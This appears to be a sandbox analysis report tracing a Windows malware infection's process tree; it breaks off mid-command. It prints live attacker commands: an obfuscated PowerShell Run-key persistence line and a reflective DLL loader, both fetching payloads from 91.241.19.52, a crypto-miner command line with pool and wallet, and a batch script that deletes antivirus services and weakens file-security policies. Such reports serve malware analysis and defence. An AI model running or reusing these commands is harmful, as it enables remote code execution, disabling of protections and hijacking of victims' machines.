PID 2160 wrote to memory of 672 2160 explorer.exe fsucenter.exe
PID 2848 wrote to memory of 2276 2848 DB64.exe Runtimebroker.exe
PID 2848 wrote to memory of 2276 2848 DB64.exe Runtimebroker.exe
PID 2848 wrote to memory of 2276 2848 DB64.exe Runtimebroker.exe
PID 2724 wrote to memory of 424 2724 E4CB.exe
PID 2724 wrote to memory of 424 2724 E4CB.exe
PID 2724 wrote to memory of 424 2724 E4CB.exe
PID 2724 wrote to memory of 996 2724 EEDE.exe
PID 2724 wrote to memory of 996 2724 EEDE.exe
PID 2724 wrote to memory of 996 2724 EEDE.exe
PID 2724 wrote to memory of 1840 2724 F008.exe
PID 2724 wrote to memory of 1840 2724 F008.exe
PID 2724 wrote to memory of 1840 2724 F008.exe
PID 2724 wrote to memory of 544 2724 F151.exe
PID 2724 wrote to memory of 544 2724 F151.exe
PID 2724 wrote to memory of 544 2724 F151.exe
PID 2276 wrote to memory of 508 2276 Runtimebroker.exe powershell.exe
PID 2276 wrote to memory of 508 2276 Runtimebroker.exe powershell.exe
PID 2276 wrote to memory of 508 2276 Runtimebroker.exe powershell.exe
PID 2724 wrote to memory of 1188 2724 explorer.exe
PID 2724 wrote to memory of 1188 2724 explorer.exe
PID 2724 wrote to memory of 1188 2724 explorer.exe
PID 2724 wrote to memory of 1188 2724 explorer.exe
PID 2724 wrote to memory of 1908 2724 explorer.exe
PID 2724 wrote to memory of 1908 2724 explorer.exe
PID 2724 wrote to memory of 1908 2724 explorer.exe
PID 2724 wrote to memory of 2016 2724 explorer.exe
PID 2724 wrote to memory of 2016 2724 explorer.exe
PID 2724 wrote to memory of 2016 2724 explorer.exe
PID 2724 wrote to memory of 2016 2724 explorer.exe
PID 2724 wrote to memory of 204 2724 explorer.exe
PID 2724 wrote to memory of 204 2724 explorer.exe
PID 2724 wrote to memory of 204 2724 explorer.exe
PID 2724 wrote to memory of 2160 2724 explorer.exe
PID 2724 wrote to memory of 2160 2724 explorer.exe
PID 2724 wrote to memory of 2160 2724 explorer.exe
PID 2724 wrote to memory of 2160 2724 explorer.exe
PID 2724 wrote to memory of 3356 2724 explorer.exe

Processes
-
C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe (depth 1)
  "C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe (depth 2)
  "C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\C8A5.exe (depth 1)
  C:\Users\Admin\AppData\Local\Temp\C8A5.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-E04SA.tmp\C8A5.tmp (depth 2)
  "C:\Users\Admin\AppData\Local\Temp\is-E04SA.tmp\C8A5.tmp" /SL5="$60050,4193427,831488,C:\Users\Admin\AppData\Local\Temp\C8A5.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C8A5.exe (depth 3)
  "C:\Users\Admin\AppData\Local\Temp\C8A5.exe" /VERYSILENT
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-0LF1Q.tmp\C8A5.tmp (depth 4)
  "C:\Users\Admin\AppData\Local\Temp\is-0LF1Q.tmp\C8A5.tmp" /SL5="$70050,4193427,831488,C:\Users\Admin\AppData\Local\Temp\C8A5.exe" /VERYSILENT
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe (depth 5)
  "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe (depth 6)
  "C:\ProgramData\Data\install.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe (depth 7)
  "C:\ProgramData\Data\install.exe"
- Executes dropped EXE
-
C:\ProgramData\Data\install.exe (depth 7)
  "C:\ProgramData\Data\install.exe"
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe (depth 8)
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nWOVzGuqQJ.bat"
-
C:\Windows\SysWOW64\chcp.com (depth 9)
  chcp 65001
-
C:\Windows\SysWOW64\w32tm.exe (depth 9)
  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
C:\Windows\System32\w32tm.exe (depth 10)
  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
C:\Windows\SysWOW64\mfvdsp\RuntimeBroker.exe (depth 9)
  "C:\Windows\System32\mfvdsp\RuntimeBroker.exe"
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exe (depth 6)
  NULL
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (depth 6)
  -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\D6BF.exe (depth 1)
  C:\Users\Admin\AppData\Local\Temp\D6BF.exe
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DB64.exe (depth 1)
  C:\Users\Admin\AppData\Local\Temp\DB64.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe (depth 2)
  "C:\ProgramData\Runtimebroker.exe"
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
  powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
  powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
  "powershell" Get-MpPreference -verbose
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
  "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete 
"HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t 
REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d 
"%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe 